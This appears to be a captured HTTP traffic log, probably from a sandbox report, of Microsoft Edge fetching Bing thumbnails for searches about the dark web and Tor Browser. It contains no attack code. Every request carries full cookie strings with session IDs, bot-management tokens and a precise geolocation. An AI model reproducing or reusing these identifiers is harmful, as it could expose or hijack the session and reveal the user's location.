cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 857
x-check-cacheable: YES
cache-control: public, max-age=1298292
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a781
GET

https://th.bing.com/th?q=Dark+Web+Browser&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Dark+Web+Browser&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1398
cache-control: public, max-age=2420071
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a787
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Dark+Web+Enter&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Dark+Web+Enter&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 857
x-check-cacheable: YES
cache-control: public, max-age=772886
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a77f
GET

https://th.bing.com/th?q=Tor+Browser+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Tor+Browser+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 857
x-check-cacheable: YES
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a774
GET

https://th.bing.com/th?q=Dark+Web+Shopping&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Dark+Web+Shopping&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1385
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a775
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Dark+Web+Access&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Dark+Web+Access&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1493
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a77a
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
